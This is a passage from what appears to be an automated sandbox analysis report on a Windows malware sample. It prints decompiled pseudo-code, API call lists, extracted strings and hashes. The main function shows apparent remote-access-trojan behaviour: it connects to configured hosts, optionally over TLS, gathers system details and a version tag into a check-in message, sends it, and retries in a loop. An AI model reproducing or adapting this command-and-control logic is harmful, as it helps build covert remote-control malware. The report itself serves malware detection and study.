				char _v956;
				char _v980;
				char _v1004;
				char _v1028;
				char _v1052;
				char _v1076;
				char _v1100;
				char _v1124;
				char _v1148;
				char _v1172;
				char _v1196;
				char _v1220;
				char _v1244;
				char _v1268;
				char _v1292;
				char _v1316;
				char _v1340;
				char _v1364;
				char _v1388;
				char _v1412;
				char _v1436;
				char _v2436;
				signed int _t166;
				void* _t168;
				long _t172;
				void* _t174;
				signed char _t178;
				void* _t184;
				short _t195;
				void* _t197;
				void* _t198;
				void* _t200;
				long _t204;
				short _t209;
				void* _t210;
				void* _t212;
				void* _t225;
				void* _t233;
				void* _t234;
				void* _t237;
				intOrPtr* _t238;
				void* _t241;
				void* _t242;
				void* _t243;
				void* _t246;
				void* _t248;
				void* _t251;
				void* _t252;
				void* _t253;
				void* _t254;
				void* _t256;
				void* _t257;
				void* _t258;
				intOrPtr* _t353;
				void* _t367;
				void* _t369;
				void* _t371;
				void* _t373;
				void* _t375;
				long _t379;
				void* _t380;
				void* _t381;
				char* _t401;
				void* _t616;
				void* _t625;
				void* _t677;
				signed short _t681;
				struct _SECURITY_ATTRIBUTES* _t684;
				void* _t694;
				void* _t695;
				void* _t696;
				void* _t697;
				void* _t698;
				void* _t699;
				void* _t700;
				void* _t701;
				void* _t703;
				void* _t704;
				void* _t708;
				void* _t709;
				void* _t710;
				void* _t711;
				void* _t712;
				long _t714;

				_push(_t380);
				E004020D5(_t380,  &_v104);
				L00416FDC( &_v236, _t616);
				E004020D5(_t380,  &_v1436);
				_t677 = 0x46c578;
				_t166 = L00436769(_t164, L00401F95(L00401E49(0x46c578, _t616, _t712, 0x29)));
				if(_t166 != 0) {
					_t379 = _t166 * 0x3e8;
					_t714 = _t379;
					Sleep(_t379);
				}
				_t695 = _t694 - 0x18;
				E00402084(_t380, _t695, 0x4657ec);
				_t168 = L00401E49(_t677, _t616, _t714, 0);
				_t696 = _t695 - 0x18;
				E004020EC(_t380, _t696, _t616, _t714, _t168);
				E00417478( &_v32, _t616);
				_t697 = _t696 + 0x30;
				_t684 = 0;
				_v8 = 0;
				_t381 = 0;
				L00401E49(_t677, _t616, _t714, 0x3a);
				_t617 = 0x45f6bc;
				_t172 = L0040EAD9(_t714);
				_t715 = _t172;
				if(_t172 != 0) {
					L00401E49(_t677, 0x45f6bc, _t715, 0x3a);
					_t367 = E00402489();
					_t369 = L00401F95(L00401E49(_t677, 0x45f6bc, _t715, 0x3a));
					L00401E49(_t677, 0x45f6bc, _t715, 0x39);
					_t371 = E00402489();
					_t373 = L00401F95(L00401E49(_t677, _t617, _t715, 0x39));
					L00401E49(_t677, _t617, _t715, 0x38);
					_t375 = E00402489();
					L00401F95(L00401E49(_t677, _t617, _t715, 0x38));
					_t617 = _t375;
					L00404882(_t375, _t373, _t371, _t369, _t367);
					_t697 = _t697 + 0x10;
					_t684 = 0;
				}
				L4:
				_t698 = _t697 - 0x18;
				E00402084(_t381, _t698, 0x4657f0);
				_t174 = L00401E49( &_v32, _t617, _t715, _t381);
				_t699 = _t698 - 0x18;
				E004020EC(_t381, _t699, _t617, _t715, _t174);
				E00417478( &_v20, _t617);
				_t697 = _t699 + 0x30;
				L00401E49( &_v20, _t617, _t715, 2);
				_t618 = "0";
				_t178 = L00405A6F("0");
				asm("sbb al, al");
				 *0x46bae0 =  ~_t178 + 1;
				E0040498B(0x46c780);
				if(_t684 >= 0 || E004021F5( &_v32) > 1) {
					_t718 =  *0x46c781 - 1;
					_t401 =  &_v104;
					if( *0x46c781 != 1) {
						_push(0x45f6bc);
					} else {
						_push(" (TLS)");
					}
					L00405A0B(_t381, _t401);
					_t700 = _t697 - 0x18;
					_t184 = L00401E49( &_v20, _t618, _t718, 1);
					_t617 = L00402F93(_t381,  &_v128, E00405343(_t381,  &_v56, L004075E6( &_v80, "Connecting to ", _t718, L00401E49( &_v20, _t618, _t718, 0)), _t677, _t718, 0x4657f0), _t718, _t184);
					L00402F93(_t381, _t700, _t188, _t718,  &_v104);
					_t701 = _t700 - 0x14;
					E00402084(_t381, _t701, "[Info]");
					L00416C80(_t381, _t677);
					_t697 = _t701 + 0x30;
					L00401FC7();
					L00401FC7();
					L00401FC7();
					_t684 = _v8;
				}
				_t195 = 2;
				 *0x46bacc = _t195;
				_t197 = L00401F95(L00401E49( &_v20, _t617, _t718, 0));
				__imp__#52(_t197); // executed
				_t719 = _t197;
				if(_t197 != 0) {
					E004324E0(0x46bad0,  *((intOrPtr*)( *((intOrPtr*)(_t197 + 0xc)))),  *((short*)(_t197 + 0xa)));
					_t209 = L00436769(_t207, L00401F95(L00401E49( &_v20, _t617, _t719, 1)));
					__imp__#9();
					_t697 = _t697 + 0xc - 0x10;
					 *0x46bace = _t209;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t210 = E00404A08(_t617, _t209); // executed
					_t720 = _t210;
					if(_t210 != 0) {
						_t703 = _t697 - 0x18;
						_t212 = L00401E49( &_v20, _t617, _t720, 1);
						_t625 = L00402F93(_t381,  &_v56, E00405343(_t381,  &_v188, L004075E6( &_v212, "Connected to  ", _t720, L00401E49( &_v20, _t617, _t720, 0)), 0x46c780, _t720, 0x4657f0), _t720, _t212);
						L00402F93(_t381, _t703, _t625, _t720,  &_v104);
						_t704 = _t703 - 0x14;
						E00402084(_t381, _t704, "[Info]");
						L00416C80(_t381, 0x46c780);
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00404E9A(0x46c780, 0xa, 0);
						_v164 = 0;
						asm("stosd");
						_v8 = 1;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t225 = L00416EFA(0x46c780);
						_push(_t625);
						L00411912( &_v164, "%I64u", _t225);
						E00407350(_t381,  &_v128, _t625, _t720, 0x46c3b0);
						L0043BACE( &_v128,  *0x46a9d0,  &_v140, 0xa);
						E004020EC(_t381,  &_v80, _t625, _t720, L00401E49(0x46c578, _t625, _t720, 1));
						_t233 = E00402489();
						_t234 = L00401F95(0x46c560);
						_t237 = L00410A30(L00401F95(0x46c518), "name",  &_v2436, 0x104, _t234, _t233);
						_t708 = _t704 + 0x60;
						if(_t237 != 0) {
							L00405A0B(_t381,  &_v80,  &_v2436);
						}
						_t238 =  *0x46bd44; // 0x0
						_t681 = 0;
						_t722 = _t238;
						if(_t238 != 0) {
							_t681 =  *_t238() & 0x0000ffff;
						}
						E0040427F(_t381,  &_v56, "C:\Windows\SysWOW64\DpiScaling.exe");
						_t709 = _t708 - 0x18;
						_t241 = E0041739C(_t381,  &_v1412, 0x46c500);
						_t242 = E00417226(_t381,  &_v1388, _t681 & 0x0000ffff);
						_t243 = L00401E49( &_v20, _t681 & 0x0000ffff, _t722, 0);
						_t246 = E00417226(_t381,  &_v1364, GetTickCount());
						_t248 = E00417226(_t381,  &_v1340, E004171D6( &_v1364));
						_t251 = E0041739C(_t381,  &_v1292, E0041719C( &_v1316));
						_t252 = E0041739C(_t381,  &_v1268, 0x46c0e0);
						_t253 = E0041739C(_t381,  &_v1244,  &_v56);
						_t254 = E0041739C(_t381,  &_v1220,  &_v128);
						_t256 = E0041739C(_t381,  &_v1196, 0x46c880);
						_t257 = E0040D1E5( &_v1172);
						_t258 = E0041739C(_t381,  &_v1148, 0x46c584);
						_t617 = L00402F93(_t381,  &_v212, L00402F93(_t381,  &_v188, L00402F93(_t381,  &_v260, L00402F1D( &_v284, L00402F93(_t381,  &_v308, L00402F1D( &_v332, L00402F93(_t381,  &_v356, L00402F93(_t381,  &_v380, L00402F93(_t381,  &_v404, L00402F93(_t381,  &_v428, L00402F93(_t381,  &_v452, E00405343(_t381,  &_v476, L00402F93(_t381,  &_v500, L00402F1D( &_v524, L00402F93(_t381,  &_v548, L00402F1D( &_v572, L00402F93(_t381,  &_v596, L0040759C(_t381,  &_v620, L00402F93(_t381,  &_v644, L00402F1D( &_v668, L00402F93(_t381,  &_v692, L00402F1D( &_v716, L00402F93(_t381,  &_v740, L00402F1D( &_v764, L00402F93(_t381,  &_v788, L00402F1D( &_v812, L00402F93(_t381,  &_v836, E00405343(_t381,  &_v860, L00402F93(_t381,  &_v884, E00405343(_t381,  &_v908, L00402F93(_t381,  &_v932, L00402F1D( &_v956, L00402F93(_t381,  &_v980, L00402F93(_t381,  &_v1004, L00402F93(_t381,  &_v1028, L00402F1D( &_v1052, L00402F93(_t381,  &_v1076, L00402F1D( &_v1100, L00402FB7( &_v1124,  &_v80, 0x46c238), _t258), _t722, 0x46c238), _t257), _t722, 0x46c238), _t722, 0x46c5b4), _t722, 0x46c238), _t256), _t722, 0x46c238), 0x46c238, _t722,  &_v164), _t722, 0x46c238), 0x46c238, _t722, "3.2.1 Pro"), _t722, 0x46c238), _t254), _t722, 0x46c238), _t253), _t722, 0x46c238), _t252), _t722, 0x46c238), _t251), _t722, 0x46c238), 0x46c238, _t722,  *0x46a9d4 & 0x000000ff), _t722, 0x46c238), _t248), _t722, 0x46c238), _t246), _t722, 0x46c238), 0x46c238, _t722,  &_v140), _t722, 0x46c238), _t722, _t243), _t722, 0x46c238), _t722, "Sept-AITAB5"), _t722, 0x46c238), _t242), _t722, 0x46c238), _t241), _t722, 0x46c238), _t722,  &_v236), _t722, 0x46c238);
						L00402F93(_t381, _t709, _t297, _t722, "Exe");
						_push(0x4b);
						L00404AA4(_t381, 0x46c780, _t297, _t722);
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401EF0();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401FC7();
						L00401EF0();
						L00404BBE(0x46c780, _t297, E004123B9, 1);
						_t353 =  *0x46bd48; // 0x0
						if(_t353 != 0 &&  *0x46bd4d != 0) {
							_t353 =  *_t353();
							 *0x46bd4d = 0;
						}
						if( *0x46c39a != 0) {
							_t353 = L0040951E(_t381, 0x46c350);
						}
						L004059C5(_t353);
						_t710 = _t709 - 0x18;
						E00402084(_t381, _t710, "Disconnected!");
						_t711 = _t710 - 0x18;
						E00402084(_t381, _t711, "[Info]");
						L00416C80(_t381, 0x46c238);
						_t697 = _t711 + 0x30;
						if( *0x46bea4 != 0) {
							CreateThread(0, 0, L0041667F, 0, 0, 0);
						}
						L00401FC7();
						L00401EF0();
					}
					_t684 = _v8;
					_t677 = 0x46c578;
				}
				_t684 = _t684 - 1;
				_v8 = _t684;
				_t381 = _t381 + 1;
				_t198 = E004021F5( &_v32);
				_t728 = _t381 - _t198;
				if(_t381 >= _t198) {
					_t200 = 2;
					_t381 = 0;
					_t204 = L00436769(_t201, L00401F95(L00401E49(_t677, _t617, _t728, _t200))) * 0x3e8;
					_t715 = _t204;
					Sleep(_t204); // executed
				}
				L00401E74( &_v20, _t617);
				goto L4;
			}

































































































































                                    0x00411935
                                    0x00411938
                                    0x00411943
                                    0x0041194e
                                    0x00411953
                                    0x00411969
                                    0x00411971
                                    0x00411973
                                    0x00411973
                                    0x0041197a
                                    0x0041197a
                                    0x00411980
                                    0x0041198a
                                    0x00411993
                                    0x00411998
                                    0x0041199e
                                    0x004119a6
                                    0x004119ab
                                    0x004119ae
                                    0x004119b2
                                    0x004119b5
                                    0x004119b9
                                    0x004119be
                                    0x004119c5
                                    0x004119ca
                                    0x004119cc
                                    0x004119d2
                                    0x004119d9
                                    0x004119ea
                                    0x004119f4
                                    0x004119fb
                                    0x00411a0c
                                    0x00411a16
                                    0x00411a1d
                                    0x00411a2f
                                    0x00411a34
                                    0x00411a38
                                    0x00411a3d
                                    0x00411a40
                                    0x00411a40
                                    0x00411a42
                                    0x00411a42
                                    0x00411a4c
                                    0x00411a55
                                    0x00411a5a
                                    0x00411a60
                                    0x00411a68
                                    0x00411a6d
                                    0x00411a75
                                    0x00411a7a
                                    0x00411a81
                                    0x00411a8d
                                    0x00411a91
                                    0x00411a96
                                    0x00411a9d
                                    0x00411ab0
                                    0x00411ab7
                                    0x00411aba
                                    0x00411ac3
                                    0x00411abc
                                    0x00411abc
                                    0x00411abc
                                    0x00411ac8
                                    0x00411acd
                                    0x00411adb
                                    0x00411b15
                                    0x00411b19
                                    0x00411b1e
                                    0x00411b28
                                    0x00411b2d
                                    0x00411b32
                                    0x00411b38
                                    0x00411b40
                                    0x00411b48
                                    0x00411b4d
                                    0x00411b4d
                                    0x00411b52
                                    0x00411b58
                                    0x00411b65
                                    0x00411b6b
                                    0x00411b71
                                    0x00411b73
                                    0x00411b88
                                    0x00411ba2
                                    0x00411ba9
                                    0x00411baf
                                    0x00411bb2
                                    0x00411bbf
                                    0x00411bc0
                                    0x00411bc1
                                    0x00411bc2
                                    0x00411bca
                                    0x00411bcf
                                    0x00411bd1
                                    0x00411bd7
                                    0x00411be5
                                    0x00411c25
                                    0x00411c29
                                    0x00411c2e
                                    0x00411c38
                                    0x00411c3d
                                    0x00411c48
                                    0x00411c53
                                    0x00411c5e
                                    0x00411c69
                                    0x00411c6e
                                    0x00411c7f
                                    0x00411c81
                                    0x00411c84
                                    0x00411c85
                                    0x00411c86
                                    0x00411c87
                                    0x00411c88
                                    0x00411c8d
                                    0x00411c9b
                                    0x00411cab
                                    0x00411cbf
                                    0x00411cd6
                                    0x00411ce2
                                    0x00411cea
                                    0x00411d0d
                                    0x00411d12
                                    0x00411d17
                                    0x00411d23
                                    0x00411d23
                                    0x00411d28
                                    0x00411d2d
                                    0x00411d2f
                                    0x00411d31
                                    0x00411d35
                                    0x00411d35
                                    0x00411d40
                                    0x00411d45
                                    0x00411d68
                                    0x00411d7c
                                    0x00411d93
                                    0x00411db0
                                    0x00411dc4
                                    0x00411de7
                                    0x00411df9
                                    0x00411e09
                                    0x00411e19
                                    0x00411e39
                                    0x00411e4c
                                    0x00411e5e
                                    0x00412088
                                    0x0041208c
                                    0x00412097
                                    0x0041209b
                                    0x004120a6
                                    0x004120b1
                                    0x004120bc
                                    0x004120c7
                                    0x004120d2
                                    0x004120dd
                                    0x004120e8
                                    0x004120f3
                                    0x004120fe
                                    0x00412109
                                    0x00412114
                                    0x0041211f
                                    0x0041212a
                                    0x00412135
                                    0x00412140
                                    0x0041214b
                                    0x00412156
                                    0x00412161
                                    0x0041216c
                                    0x00412177
                                    0x00412182
                                    0x0041218d
                                    0x00412198
                                    0x004121a3
                                    0x004121ae
                                    0x004121b9
                                    0x004121c4
                                    0x004121cf
                                    0x004121da
                                    0x004121e5
                                    0x004121f0
                                    0x004121fb
                                    0x00412206
                                    0x00412211
                                    0x0041221c
                                    0x00412227
                                    0x00412232
                                    0x0041223d
                                    0x00412248
                                    0x00412253
                                    0x0041225e
                                    0x00412269
                                    0x00412274
                                    0x0041227f
                                    0x0041228a
                                    0x00412295
                                    0x004122a0
                                    0x004122ab
                                    0x004122b6
                                    0x004122c1
                                    0x004122cc
                                    0x004122d4
                                    0x004122e2
                                    0x004122e7
                                    0x004122ee
                                    0x004122f9
                                    0x004122fb
                                    0x004122fb
                                    0x00412309
                                    0x00412310
                                    0x00412310
                                    0x00412315
                                    0x0041231a
                                    0x00412324
                                    0x00412329
                                    0x00412333
                                    0x00412338
                                    0x0041233d
                                    0x00412347
                                    0x00412355
                                    0x00412355
                                    0x0041235e
                                    0x00412366
                                    0x00412366
                                    0x0041236b
                                    0x0041236e
                                    0x0041236e
                                    0x00412373
                                    0x00412377
                                    0x0041237a
                                    0x0041237b
                                    0x00412380
                                    0x00412382
                                    0x00412386
                                    0x0041238a
                                    0x0041239e
                                    0x0041239e
                                    0x004123a6
                                    0x004123a6
                                    0x004123af
                                    0x00000000

                                    APIs
                                    • Sleep.KERNEL32(00000000,00000029,76D243E0,0046C578,00000000), ref: 0041197A
                                      • Part of subcall function 00416C80: GetLocalTime.KERNEL32(00000000), ref: 00416C9A
                                    • gethostbyname.WS2_32(00000000), ref: 00411B6B
                                    • htons.WS2_32(00000000), ref: 00411BA9
                                    • Sleep.KERNELBASE(00000000,00000002), ref: 004123A6
                                      • Part of subcall function 00410A30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,0046C518), ref: 00410A4C
                                      • Part of subcall function 00410A30: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00410A65
                                      • Part of subcall function 00410A30: RegCloseKey.ADVAPI32(00000000), ref: 00410A70
                                    • GetTickCount.KERNEL32 ref: 00411DA2
                                      • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                                    • CreateThread.KERNEL32(00000000,00000000,0041667F,00000000,00000000,00000000), ref: 00412355
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep$CloseCountCreateLocalOpenQueryThreadTickTimeValuegethostbynamehtonssend
                                    • String ID: (TLS)$%I64u$3.2.1 Pro$C:\Windows\SysWOW64\DpiScaling.exe$Connected to $Connecting to $Disconnected!$Exe$Sept-AITAB5$[Info]$name
                                    • API String ID: 2130001850-3324633824
                                    • Opcode ID: 84124b14032a4df0096ec80117b5006fc14e4facae42a20016c6dca21af4b9ea
                                    • Instruction ID: c8c226d7e30845bf2bb3d2e67be1d86719b60e177ee7695842f0b4eb2dcf0a18
                                    • Opcode Fuzzy Hash: 84124b14032a4df0096ec80117b5006fc14e4facae42a20016c6dca21af4b9ea
                                    • Instruction Fuzzy Hash: ED427A31A102155BCB18F762DD56AEEB375AF50308F5001BFB40AB61E2EF785F858E89
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041805B, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 134COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 84%
                                    			E0041805B(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v524;
				char _v544;
				char _v560;
				char _v572;
				void* _v576;
				char _v580;
				char _v584;
				char _v600;
				char _v608;
				char _v616;
				char _v620;
				void* _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v644;
				void* _v648;
				char _v652;
				void* _v672;
				void* __ebx;
				signed int _t36;
				void* _t39;
				void* _t40;
				void* _t77;

				_t73 = __edx;
				_t77 = __ecx;
				_t54 = __edx;
				L00401F6D(__edx,  &_v644);
				_t36 = __edx + 0xffffffd0;
				_t85 = _t36 - 7;
				if(_t36 <= 7) {
					switch( *((intOrPtr*)(_t36 * 4 +  &M00418237))) {
						case 0:
							_push(L"Temp");
							goto L14;
						case 1:
							__ecx =  &_v620;
							__eax = L00416D45(__ebx,  &_v620);
							__ecx =  &_v644;
							__eax = L00401EFA( &_v644, __edx, __esi, __eax);
							goto L4;
						case 2:
							_push(L"SystemDrive");
							goto L14;
						case 3:
							_push(L"WinDir");
							goto L14;
						case 4:
							__eax = L00417614(__ecx);
							__eflags = __al;
							if(__eflags != 0) {
								__ecx =  &_v620;
								E0040427F(__ebx, __ecx, L"\\SysWOW64") = L0043987F(__ebx, __ecx, __eflags, L"WinDir");
								__ecx =  &_v600;
								__edx = __eax;
								__ecx =  &_v580;
								__eax = E00403030( &_v580, __edx, __eax);
								__ecx =  &_v652;
								__eax = L00401EFA( &_v652, __edx, __esi, __eax);
								__ecx =  &_v584;
								__eax = L00401EF0();
								__ecx =  &_v608;
								__eax = L00401EF0();
								L4:
								__ecx =  &_v620;
								goto L5;
							} else {
								__ecx =  &_v572;
								E0040427F(__ebx, __ecx, L"\\system32") = L0043987F(__ebx, __ecx, __eflags, L"WinDir");
								__ecx =  &_v600;
								__edx = __eax;
								__ecx =  &_v628;
								__eax = E00403030( &_v628, __edx, __eax);
								__ecx =  &_v652;
								__eax = L00401EFA( &_v652, __edx, __esi, __eax);
								__ecx =  &_v632;
								__eax = L00401EF0();
								__ecx =  &_v608;
								__eax = L00401EF0();
								__ecx =  &_v584;
								L5:
								__eax = L00401EF0();
								goto L15;
							}
							L16:
						case 5:
							_push(L"ProgramFiles");
							goto L14;
						case 6:
							_push(L"AppData");
							goto L14;
						case 7:
							_push(L"UserProfile"); // executed
							L14:
							_t51 = L0043987F(_t54, _t57, _t85); // executed
							L00409DC9(_t54,  &_v644, _t51);
							goto L15;
					}
				}
				L15:
				__imp__GetLongPathNameW(L00401EEB( &_v644),  &_v524, 0x208); // executed
				_t39 = E0040427F(_t54,  &_v560, _a4);
				_t40 = E0040427F(_t54,  &_v636, "\\");
				E00403030(_t77, E00403030( &_v600, E004183F4(_t54,  &_v616, _t73, _t85,  &_v544, _t38), _t40), _t39);
				L00401EF0();
				L00401EF0();
				L00401EF0();
				L00401EF0();
				L00401EF0();
				return _t77;
				goto L16;
			}



























                                    0x0041805b
                                    0x0041806a
                                    0x0041806c
                                    0x00418072
                                    0x0041807a
                                    0x0041807d
                                    0x00418080
                                    0x00418086
                                    0x00000000
                                    0x0041808d
                                    0x00000000
                                    0x00000000
                                    0x00418097
                                    0x0041809b
                                    0x004180a1
                                    0x004180a5
                                    0x00000000
                                    0x00000000
                                    0x004180b8
                                    0x00000000
                                    0x00000000
                                    0x004180c2
                                    0x00000000
                                    0x00000000
                                    0x004180cc
                                    0x004180d1
                                    0x004180d3
                                    0x0041812c
                                    0x0041813b
                                    0x00418142
                                    0x0041814b
                                    0x0041814d
                                    0x00418151
                                    0x00418158
                                    0x0041815c
                                    0x00418161
                                    0x00418165
                                    0x0041816a
                                    0x0041816e
                                    0x004180aa
                                    0x004180aa
                                    0x00000000
                                    0x004180d5
                                    0x004180da
                                    0x004180e9
                                    0x004180f0
                                    0x004180f9
                                    0x004180fb
                                    0x004180ff
                                    0x00418106
                                    0x0041810a
                                    0x0041810f
                                    0x00418113
                                    0x00418118
                                    0x0041811c
                                    0x00418121
                                    0x004180ae
                                    0x004180ae
                                    0x00000000
                                    0x004180ae
                                    0x00000000
                                    0x00000000
                                    0x00418178
                                    0x00000000
                                    0x00000000
                                    0x0041817f
                                    0x00000000
                                    0x00000000
                                    0x00418186
                                    0x0041818b
                                    0x0041818b
                                    0x00418196
                                    0x00000000
                                    0x00000000
                                    0x00418086
                                    0x0041819b
                                    0x004181b2
                                    0x004181c1
                                    0x004181d0
                                    0x004181f8
                                    0x00418202
                                    0x0041820b
                                    0x00418214
                                    0x0041821d
                                    0x00418226
                                    0x00418233
                                    0x00000000

                                    APIs
                                    • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 004181B2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: LongNamePath
                                    • String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                    • API String ID: 82841172-1609423294
                                    • Opcode ID: be433cda313306e0d1e55ba56c8bd3f8965dad503107297eafce7f391df70cbd
                                    • Instruction ID: e17f698a51b082165e1e9e1ea6160020ed1fd31ab47ab9f863ee2cf3c228b6bb
                                    • Opcode Fuzzy Hash: be433cda313306e0d1e55ba56c8bd3f8965dad503107297eafce7f391df70cbd
                                    • Instruction Fuzzy Hash: EE4189721182409AC204FB21DC52DEF77A9BFA4748F50053FF846620F2EE785E4AC65B
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00404A08, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60networkCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 60%
                                    			E00404A08(void* __edx, char _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t12;
				signed int _t15;
				void* _t16;
				void* _t22;
				void* _t23;
				signed int _t25;
				void* _t31;
				char* _t32;
				void* _t33;

				_t22 = _t23;
				_t32 =  &_a4;
				_t2 = _t22 + 8; // 0x46dba0
				_t12 = _t2;
				_t31 = _t12;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd"); // executed
				__imp__#4( *((intOrPtr*)(_t22 + 4)), _t12, 0x10); // executed
				if(_t12 != 0) {
					L5:
					return 0;
				}
				if( *((intOrPtr*)(_t22 + 1)) == _t12) {
					L9:
					return 1;
				}
				_t15 = L0041C71E(_t22, _t23); // executed
				 *(_t22 + 0x44) = _t15;
				if(_t15 == 0) {
					goto L5;
				}
				_t30 =  *((intOrPtr*)(_t22 + 4));
				_t16 = L0041C76C(_t15,  *((intOrPtr*)(_t22 + 4)));
				_t25 =  *(_t22 + 0x44);
				if(_t16 == 1) {
					if(E0041D1ED() == 1) {
						goto L9;
					}
					_t34 = _t33 - 0x18;
					E00402084(_t22, _t33 - 0x18, "TLS Authentication failed");
					E00402084(_t22, _t34 - 0x18, "[ERROR]");
					_t16 = L0041C8E7(L00416C80(_t22, _t31),  *(_t22 + 0x44));
					_t25 =  *(_t22 + 0x44);
				}
				L0041C763(_t16, _t22, _t25, _t30, _t31, _t32);
				 *(_t22 + 0x44) =  *(_t22 + 0x44) & 0x00000000;
				goto L5;
			}
















                                    0x00404a0f
                                    0x00404a11
                                    0x00404a16
                                    0x00404a16
                                    0x00404a19
                                    0x00404a1f
                                    0x00404a20
                                    0x00404a21
                                    0x00404a22
                                    0x00404a23
                                    0x00404a2b
                                    0x00404a59
                                    0x00000000
                                    0x00404a59
                                    0x00404a30
                                    0x00404aa0
                                    0x00000000
                                    0x00404aa0
                                    0x00404a32
                                    0x00404a37
                                    0x00404a3c
                                    0x00000000
                                    0x00000000
                                    0x00404a3e
                                    0x00404a43
                                    0x00404a48
                                    0x00404a4e
                                    0x00404a6b
                                    0x00000000
                                    0x00000000
                                    0x00404a6d
                                    0x00404a77
                                    0x00404a86
                                    0x00404a96
                                    0x00404a9b
                                    0x00404a9b
                                    0x00404a50
                                    0x00404a55
                                    0x00000000

                                    APIs
                                    • connect.WS2_32(?,0046DBA0,00000010), ref: 00404A23
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: connect
                                    • String ID: TLS Authentication failed$[ERROR]
                                    • API String ID: 1959786783-1964023390
                                    • Opcode ID: 1aaa89cb3ab8e83ad8cf31946695e11ac04cd4fa2543e2936ab384321515aea8
                                    • Instruction ID: 6a9958cf6c54f084319c11af7f7712e0ea3c55cf2f2f254842a4d7e8f6879e1c
                                    • Opcode Fuzzy Hash: 1aaa89cb3ab8e83ad8cf31946695e11ac04cd4fa2543e2936ab384321515aea8
                                    • Instruction Fuzzy Hash: 9C014C7138020197DF08BF6589C65673B599F81344B04402BEE059F2C7EA7ADC44CB6E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0043D15F, Relevance: 4.6, APIs: 3, Instructions: 115COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 84%
                                    			E0043D15F(void* __ebx, signed short* _a4) {
				intOrPtr* _v8;
				signed int _v12;
				intOrPtr* _v40;
				void* __ecx;
				signed int _t22;
				intOrPtr* _t24;
				signed short _t27;
				signed int _t28;
				void* _t31;
				void* _t33;
				intOrPtr _t34;
				intOrPtr* _t36;
				signed short _t39;
				signed short* _t41;
				void* _t43;
				signed short* _t48;
				signed int _t50;
				void* _t51;
				signed short* _t59;
				signed int _t61;
				signed short* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				signed short* _t68;
				signed short* _t70;
				intOrPtr _t71;
				intOrPtr _t73;
				intOrPtr* _t74;
				void* _t79;

				_push(_t44);
				_push(_t44);
				_t41 = _a4;
				_v12 = 0;
				_t61 = 0;
				_t22 =  *_t41 & 0x0000ffff;
				_t70 = _t41;
				if(_t22 != 0) {
					_t43 = 0x3d;
					do {
						if(_t22 != _t43) {
							_t61 = _t61 + 1;
						}
						_t59 = _t70;
						_t3 =  &(_t59[1]); // 0x2
						_t68 = _t3;
						do {
							_t39 =  *_t59;
							_t59 =  &(_t59[1]);
						} while (_t39 != _v12);
						_t44 = _t59 - _t68 >> 1;
						_t70 =  &(( &(_t70[_t59 - _t68 >> 1]))[1]);
						_t22 =  *_t70 & 0x0000ffff;
					} while (_t22 != 0);
					_t41 = _a4;
				}
				_t8 = _t61 + 1; // 0x1
				_t24 = E0043F348(_t44, _t8, 4); // executed
				_t64 = _t24;
				_t71 = 0;
				if(_t64 == 0) {
					L20:
					_t64 = _t71;
					goto L21;
				} else {
					_v8 = _t64;
					while( *_t41 != _t71) {
						_t48 = _t41;
						_t10 =  &(_t48[1]); // 0x2
						_t62 = _t10;
						do {
							_t27 =  *_t48;
							_t48 =  &(_t48[1]);
						} while (_t27 != _t71);
						_t50 = _t48 - _t62 >> 1;
						_t11 = _t50 + 1; // -1
						_t28 = _t11;
						_t51 = 0x3d;
						_v12 = _t28;
						if( *_t41 == _t51) {
							L16:
							_t41 =  &(_t41[_t28]);
							continue;
						} else {
							_t73 = E0043F348(_t51, _t28, 2);
							if(_t73 == 0) {
